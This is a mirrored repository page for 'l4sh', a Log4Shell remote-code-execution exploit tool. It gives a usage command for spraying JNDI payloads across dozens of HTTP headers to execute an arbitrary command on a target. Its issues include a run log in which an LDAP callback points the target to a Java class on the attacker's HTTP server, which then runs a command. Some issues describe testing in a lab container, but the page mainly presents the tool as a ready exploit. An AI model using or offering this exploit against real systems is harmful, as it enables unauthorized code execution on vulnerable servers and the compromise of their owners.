Giter VIP home page Giter VIP logo

l4sh's Introduction

Log4Shell RCE Exploit

asciicast

fully independent exploit does not require any 3rd party binaries. The exploit spraying the payload to all possible logged HTTP Headers such as X-Forwarding , Server-IP , User-Agent

Usage

python main.py -i lhost -u http://target:targetport -c "command_to_execute" -p lhttp_port -l lldap_port

Requirements

  • java-8-openjdk
  • pip install -r requirements.txt
  • python3.6+

l4sh's People

Contributors

safebuffer avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar

l4sh's Issues

got some errors..

[] Started http server on 9999
[
] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
Traceback (most recent call last):
File "main.py", line 243, in
main()
File "main.py", line 240, in main
get_a_life(target_options)
File "main.py", line 199, in get_a_life
spray_headers(target_options,command,args)
File "main.py", line 128, in spray_headers
go_clutch(url=url,method=request_method,data=None,headers=additionalrequest_headers)
File "main.py", line 51, in go_clutch
request_data.update(data)
TypeError: 'NoneType' object is not iterable

What's the problem ? :/

hi i just get some errors

File "main.py", line 243, in
main()
File "main.py", line 240, in main
get_a_life(target_options)
File "main.py", line 199, in get_a_life
spray_headers(target_options,command,args)
File "main.py", line 128, in spray_headers
go_clutch(url=url,method=request_method,data=None,headers=additionalrequest_headers)
File "main.py", line 50, in go_clutch
request_data.update(data)

can't reproduce

I can't reproduce it, what's the vulnerable docker container that you used?

Doesn't work with a host's public NAT IP

The exploit currently only works if the target can reach the exploiting host's private IP. The exploit needs an option to allow callbacks to a public IP or DNS name that resolves back to a public IP that NATs back to the private IP.

can't reproduce

Having used #2 I still can't see file creation:

The exploit seems to have been applied:

python3 main.py -i 172.17.0.1 -u http://172.17.0.3:8080 -c "touch foobar" -p9999  


    ██╗      ██████╗  ██████╗ ██╗  ██╗███████╗██╗  ██╗███████╗██╗     ██╗     
    ██║     ██╔═══██╗██╔════╝ ██║  ██║██╔════╝██║  ██║██╔════╝██║     ██║     
    ██║     ██║   ██║██║  ███╗███████║███████╗███████║█████╗  ██║     ██║     
    ██║     ██║   ██║██║   ██║╚════██║╚════██║██╔══██║██╔══╝  ██║     ██║     
    ███████╗╚██████╔╝╚██████╔╝     ██║███████║██║  ██║███████╗███████╗███████╗
    ╚══════╝ ╚═════╝  ╚═════╝      ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝
                                                                            
        Log4Shell Exploit (Cyber Struggle Delta Group) via @safe_buffer


[*] Started http server on 9999
[*] Started LDAP server on 1389
[*] Spraying 81 known HTTP Header
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar
 New HTTP Request 200  
[+] Sent the final payload your command has been executed right now
okeeje
[+] LDAP Callback sending [('javaClassName', ['Main']), ('objectClass', ['javaNamingReference']), ('javaCodeBase', ['http://172.17.0.1:9999/']), ('javaFactory', ['Main'])]
[+] Redirecting to http://172.17.0.1:9999/Main touch foobar

And in the 'vulnerable-app' container;

2021-12-15 22:07:41.325  INFO 1 --- [nio-8080-exec-5] HelloWorld                               : Received a request for API version Log4Shell-CS Reference Class Name: Main


But I can't see any file foobar in the container:

docker exec -ti vulnerable-app sh
/ # ls /tmp
hsperfdata_root                          tomcat-docbase.8080.4676561178698547045  tomcat.8080.7851898943690850285
/ # 

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.